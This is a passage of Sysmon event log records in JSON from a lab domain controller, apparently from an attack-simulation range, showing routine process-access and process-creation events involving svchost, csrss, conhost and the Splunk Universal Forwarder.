2\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3203,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.813\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.813","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3204,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.813\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-0010F7560500}\r\nSourceProcessId: 1188\r\nSourceThreadId: 4496\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00101B580500}\r\nTargetProcessId: 4584\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.813","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-0010F7560500}","SourceProcessId":"1188","SourceThreadId":"4496","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00101B580500}","TargetProcessId":"4584","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3205,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.828\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 920\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.828","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"920","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3206,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.828\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.828","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3207,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.828\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.828","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3208,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.842\r\nProcessGuid: {41C8662E-1FF3-5F25-0000-0010815A0500}\r\nProcessId: 4416\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.842","ProcessGuid":"{41C8662E-1FF3-5F25-0000-0010815A0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3209,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.828\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 4472\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010815A0500}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7d48|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.828","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"4472","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010815A0500}","TargetProcessId":"4416","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7d48|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3210,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.828\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010815A0500}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.828","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010815A0500}","TargetProcessId":"4416","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3211,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.828\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.828","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3212,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.828\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 